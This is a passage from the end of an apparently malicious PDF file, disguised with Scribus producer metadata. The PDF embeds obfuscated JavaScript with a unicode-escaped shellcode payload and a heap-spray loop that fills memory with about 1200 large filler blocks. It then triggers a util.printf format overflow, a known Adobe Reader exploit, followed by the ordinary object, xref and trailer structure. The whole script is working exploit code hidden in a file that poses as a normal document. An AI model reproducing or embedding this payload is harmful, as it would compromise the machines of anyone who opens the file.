                         "%uF603%u8EBE%u928C%uBE1F%uF6D6%u05BE%uFA96%uFE35" +
                         "%u5BCA%uCE35%u7DDE%u0566%uCAA5%uFA35%u8EC8%u7DBD" +
                         "%u885D%u8D9E%u7D2D%u9AF0%u1BE5%uD9E8%u7D87%u8D81" +
                         "%u7D2D%uE44C%uAFD8%u284D%uFEA2%uD1E7%u3155%uCBBA" +
                         "%u1F34%uD1E7%u7D88%u0573%uD290%u4DBD%u1707%u4FBD" +
                         "%u3FE5%u05D8%u7DDE%u92F8%u35D5%u6F7F%uF5D4%u057F" +
                         "%uF5D6%u057D%u7D2C%u0D49%uF810%u5E35%uF2BC%u66E7" +
                         "%uF686%u8EBE%u3055%uDCB3%u0980%u72E9%u7D8C%uE466" +
                         "%uAFD7%uB356%uF6D6%u0DBE%uE510%uC8E8%uC856%uFB3E" +
                         "%u762C%u0E88%u7588%uAE52%u2A5D%uAED4%u0985%u62E9" +
                         "%uF211%uD2BD%uD8B7%u49DB%uF592%uF6BA%uF6B3%uBDBE" +
                         "%uA616%uDDEE%uA680%uD941%u7D2A%uDE62%u0985%u7EE9" +
                         "%u0986%u7AE9%u36E5%u0B12%u8316%uDF47%uA084%u71ED" +
                         "%uAC04%u25E7%u1834%u4E8D%u1E15%u7198%u0929%uEBF9" +
                         "%uA6A2%uE1CC%uB7B5%uEADA%u93A4%uFDCD%uB1D6%uFADB" +
                         "%u8F85%uFACD%u9BB3%uE7FA%u93A4%uFADD%u84B9%uCFC7" +
                         "%uA1D6%uE0D7%u8E93%uEDDB%uB3D6%uE7C6%uA2A2%uFCD6" +
                         "%u97B3%u8EDA%u999A%uEADF%u9F9A%uFCDC%u84B7%uCFC7" +
                         "%u83D6%uE2CC%u99BB%u8ED0%uA483%uCAF2%u81B9%uE2D0" +
                         "%u97B9%uDADA%uB0B9%uE2D7%uB7B3%u7FBE%u1B3B%u2D57" +
                         "%u4060%u7B46%u0A23%u674E%u413C%u7844%u4022%u7E41" +
                         "%u0A23%u3914%u172A%u9742");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000264 00000 n 
0000000282 00000 n 
0000000327 00000 n 
0000000400 00000 n 
0000000431 00000 n 
0000000451 00000 n 
0000000490 00000 n 
0000000556 00000 n 
0000000734 00000 n 
0000000784 00000 n 
0000000865 00000 n 
0000000912 00000 n 
0000006893 00000 n 
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF